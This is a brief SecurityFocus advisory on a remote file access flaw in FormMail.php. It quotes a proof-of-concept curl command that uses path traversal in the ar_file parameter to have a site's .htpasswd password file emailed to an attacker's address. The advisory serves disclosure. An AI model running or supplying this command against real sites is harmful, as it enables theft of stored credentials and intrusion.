Joe Lumbroso FormMail.php Arbitrary Remote File Access Vulnerability

The author provided the following proof-of-concept:

Example Attack:

Assume the following
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd

Use the following curl command to have the password file emailed to you.

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php


 

Privacy Statement
Copyright 2010, SecurityFocus